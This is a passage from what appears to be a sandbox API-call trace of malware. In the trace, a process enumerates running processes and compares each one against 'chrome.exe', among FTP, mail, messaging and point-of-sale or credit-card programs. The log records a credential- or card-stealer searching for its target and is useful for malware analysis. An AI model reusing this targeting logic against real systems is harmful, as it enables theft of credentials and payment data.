szExeFile="absolutetelnet.exe")) returned 1 [0182.739] lstrcmpA (lpString1="absolutetelnet.exe", lpString2="chrome.exe") returned -1 [0182.739] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.739] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0182.740] lstrcmpA (lpString1="alftp.exe", lpString2="chrome.exe") returned -1 [0182.741] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.741] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0182.742] lstrcmpA (lpString1="barca.exe", lpString2="chrome.exe") returned -1 [0182.742] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.742] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0182.744] lstrcmpA (lpString1="bitkinex.exe", lpString2="chrome.exe") returned -1 [0182.744] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.744] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0182.745] lstrcmpA (lpString1="coreftp.exe", lpString2="chrome.exe") returned 1 [0182.745] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.746] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0182.747] lstrcmpA (lpString1="far.exe", lpString2="chrome.exe") returned 1 [0182.747] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.747] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0182.750] lstrcmpA (lpString1="filezilla.exe", lpString2="chrome.exe") returned 1 [0182.750] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.750] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0182.752] lstrcmpA (lpString1="flashfxp.exe", lpString2="chrome.exe") returned 1 [0182.752] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.752] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0182.753] lstrcmpA (lpString1="fling.exe", lpString2="chrome.exe") returned 1 [0182.754] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.754] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1008, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0182.755] lstrcmpA (lpString1="foxmailincmail.exe", lpString2="chrome.exe") returned 1 [0182.756] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.756] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0182.757] lstrcmpA (lpString1="gmailnotifierpro.exe", lpString2="chrome.exe") returned 1 [0182.757] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.757] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0182.759] lstrcmpA (lpString1="icq.exe", lpString2="chrome.exe") returned 1 [0182.759] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.759] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1030, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0182.942] lstrcmpA (lpString1="leechftp.exe", lpString2="chrome.exe") returned 1 [0182.942] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.943] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0182.944] lstrcmpA (lpString1="ncftp.exe", lpString2="chrome.exe") returned 1 [0182.944] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.944] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1044, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0182.946] lstrcmpA (lpString1="notepad.exe", lpString2="chrome.exe") returned 1 [0182.946] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.946] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0182.947] lstrcmpA (lpString1="operamail.exe", lpString2="chrome.exe") returned 1 [0182.948] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.948] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0182.949] lstrcmpA (lpString1="outlook.exe", lpString2="chrome.exe") returned 1 [0182.949] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.949] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0182.952] lstrcmpA (lpString1="pidgin.exe", lpString2="chrome.exe") returned 1 [0182.953] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.953] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0182.954] lstrcmpA (lpString1="scriptftp.exe", lpString2="chrome.exe") returned 1 [0182.954] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.954] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x107c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0182.956] lstrcmpA (lpString1="skype.exe", lpString2="chrome.exe") returned 1 [0182.956] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.956] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0182.958] lstrcmpA (lpString1="smartftp.exe", lpString2="chrome.exe") returned 1 [0182.958] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.958] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0182.960] lstrcmpA (lpString1="thunderbird.exe", lpString2="chrome.exe") returned 1 [0182.960] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.960] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0182.961] lstrcmpA (lpString1="trillian.exe", lpString2="chrome.exe") returned 1 [0182.962] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.962] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0182.963] lstrcmpA (lpString1="webdrive.exe", lpString2="chrome.exe") returned 1 [0182.964] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.964] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0182.965] lstrcmpA (lpString1="whatsapp.exe", lpString2="chrome.exe") returned 1 [0182.965] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.965] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0182.967] lstrcmpA (lpString1="winscp.exe", lpString2="chrome.exe") returned 1 [0182.967] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.967] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0182.968] lstrcmpA (lpString1="active-charge.exe", lpString2="chrome.exe") returned -1 [0182.968] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.968] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0182.970] lstrcmpA (lpString1="yahoomessenger.exe", lpString2="chrome.exe") returned 1 [0182.970] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.970] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0182.972] lstrcmpA (lpString1="afr38.exe", lpString2="chrome.exe") returned -1 [0182.972] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.972] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0182.974] lstrcmpA (lpString1="accupos.exe", lpString2="chrome.exe") returned -1 [0182.974] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.974] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1100, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0182.976] lstrcmpA (lpString1="aldelo.exe", lpString2="chrome.exe") returned -1 [0182.977] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0182.977] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0182.978] lstrcmpA (lpString1="centralcreditcard.exe", lpString2="chrome.exe") returned -1 [0183.194] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.194] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x111c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0183.196] lstrcmpA (lpString1="ccv_server.exe", lpString2="chrome.exe") returned -1 [0183.196] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.196] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0183.198] lstrcmpA (lpString1="creditservice.exe", lpString2="chrome.exe") returned 1 [0183.198] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.198] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0183.200] lstrcmpA (lpString1="edcsvr.exe", lpString2="chrome.exe") returned 1 [0183.200] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.200] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0183.201] lstrcmpA (lpString1="fpos.exe", lpString2="chrome.exe") returned 1 [0183.201] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.202] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0183.203] lstrcmpA (lpString1="isspos.exe", lpString2="chrome.exe") returned 1 [0183.203] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.203] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0183.204] lstrcmpA (lpString1="mxslipstream.exe", lpString2="chrome.exe") returned 1 [0183.205] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.205] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0183.206] lstrcmpA (lpString1="omnipos.exe", lpString2="chrome.exe") returned 1 [0183.206] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.206] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0183.207] lstrcmpA (lpString1="spcwin.exe", lpString2="chrome.exe") returned 1 [0183.208] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.208] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0183.209] lstrcmpA (lpString1="spgagentservice.exe", lpString2="chrome.exe") returned 1 [0183.209] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.209] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0183.211] lstrcmpA (lpString1="utg2.exe", lpString2="chrome.exe") returned 1 [0183.211] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.211] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="seek.exe")) returned 1 [0183.212] lstrcmpA (lpString1="seek.exe", lpString2="chrome.exe") returned 1 [0183.212] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.212] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="responsenorth.exe")) returned 1 [0183.214] lstrcmpA (lpString1="responsenorth.exe", lpString2="chrome.exe") returned 1 [0183.214] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.214] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="nothing_him_doctor.exe")) returned 1 [0183.215] lstrcmpA (lpString1="nothing_him_doctor.exe", lpString2="chrome.exe") returned 1 [0183.215] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.215] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="must_dinner.exe")) returned 1 [0183.217] lstrcmpA (lpString1="must_dinner.exe", lpString2="chrome.exe") returned 1 [0183.217] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.217] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0183.218] lstrcmpA (lpString1="iexplore.exe", lpString2="chrome.exe") returned 1 [0183.218] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.218] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.220] lstrcmpA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.220] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.220] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x133c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.221] lstrcmpA (lpString1="backgroundTaskHost.exe", lpString2="chrome.exe") returned -1 [0183.221] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.221] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.222] lstrcmpA (lpString1="backgroundTaskHost.exe", lpString2="chrome.exe") returned -1 [0183.223] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.223] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="HxTsr.exe")) returned 1 [0183.224] lstrcmpA (lpString1="HxTsr.exe", lpString2="chrome.exe") returned 1 [0183.224] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.224] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0183.225] lstrcmpA (lpString1="UsoClient.exe", lpString2="chrome.exe") returned 1 [0183.225] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.225] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.227] lstrcmpA (lpString1="backgroundTaskHost.exe", lpString2="chrome.exe") returned -1 [0183.228] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.228] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1264, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0183.442] lstrcmpA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0183.442] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.442] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe90, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0183.444] 